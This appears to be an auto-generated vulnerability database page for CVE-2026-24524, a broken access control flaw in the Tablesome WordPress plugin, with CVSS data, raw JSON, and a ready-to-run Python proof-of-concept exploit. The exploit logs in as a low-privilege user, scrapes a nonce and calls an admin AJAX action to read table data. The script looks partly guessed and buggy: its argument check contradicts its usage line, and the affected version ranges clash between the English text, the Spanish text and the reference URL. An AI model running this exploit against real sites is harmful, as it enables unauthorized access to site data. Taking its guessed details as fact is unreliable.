Security Vulnerability Report
中文
CVE-2026-24524 CVSS 4.3 MEDIUM

CVE-2026-24524

Published: 2026-01-23 15:16:08
Last Modified: 2026-04-28 15:16:10

Description

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.2.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tablesome Plugin <= 1.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2026-24524 PoC - Missing Authorization in Tablesome Plugin # Target: WordPress site with Tablesome plugin <= 1.2.8 def exploit_tablesome(target_url, username, password): """ Exploit for CVE-2026-24524: Missing Authorization vulnerability in Essekia Tablesome plugin """ session = requests.Session() # Get WordPress nonce for login login_url = urljoin(target_url, 'wp-login.php') # Login as low-privilege user login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed') return False print('[+] Login successful as low-privilege user') # Get admin nonce from tablesome admin page admin_url = urljoin(target_url, 'wp-admin/admin.php?page=tablesome') resp = session.get(admin_url) # Extract nonce (simplified - in real scenario, parse HTML properly) nonce = '' if 'tablesome' in resp.text: import re nonce_match = re.search(r'nonce":"([a-zA-Z0-9]+)"', resp.text) if nonce_match: nonce = nonce_match.group(1) # Exploit: Access admin-only function via AJAX without proper authorization ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php') # Try to access/export tablesome data without admin privileges exploit_data = { 'action': 'tablesome_get_table_data', # Unprotected admin action 'nonce': nonce, 'table_id': '1', # Target table ID 'security': nonce } resp = session.post(ajax_url, data=exploit_data) if resp.status_code == 200: print('[+] Exploit successful - Unauthorized access granted') print(f'[+] Response: {resp.text[:500]}') return True else: print('[-] Exploit may have failed or target not vulnerable') return False if __name__ == '__main__': if len(sys.argv) < 5: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') print(f'Example: python {sys.argv[0]} http://example.com/ subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_tablesome(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24524", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:08.200", "lastModified": "2026-04-28T15:16:10.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.2.8."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Essekia Tablesome tablesome permite explotar niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta a Tablesome: desde n/a hasta &lt;= 1.1.35.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}